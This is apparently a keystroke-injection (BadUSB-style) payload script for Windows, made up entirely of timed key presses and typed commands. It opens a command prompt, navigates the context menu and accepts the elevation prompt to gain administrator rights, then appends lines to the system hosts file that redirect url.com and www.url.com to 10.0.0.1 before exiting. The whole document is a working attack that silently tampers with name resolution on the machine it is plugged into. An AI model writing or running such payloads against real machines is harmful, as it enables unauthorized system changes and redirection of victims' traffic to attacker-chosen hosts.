Delay 1000
PressKey KEY_GUI_LEFT
Delay 2000
Print cmd /Q /D /T:7F /F:OFF /V:ON /K
Delay 2000
PressModKey MOD_SHIFT_LEFT KEY_F10
Delay 3000
PressKey KEY_ARROW_DOWN
Delay 4000
PressKey KEY_ENTER
Delay 3000
PressKey KEY_ARROW_LEFT
Delay 4000
PressKey KEY_ENTER
Delay 3000
PrintLine echo. >> C:\Windows\System32\drivers\etc\hosts
Delay 2000
PrintLine echo 10.0.0.1 url.com >> C:\Windows\System32\drivers\etc\hosts
Delay 2000
PrintLine echo 10.0.0.1 www.url.com >> C:\Windows\System32\drivers\etc\hosts
Delay 2000
PrintLine exit
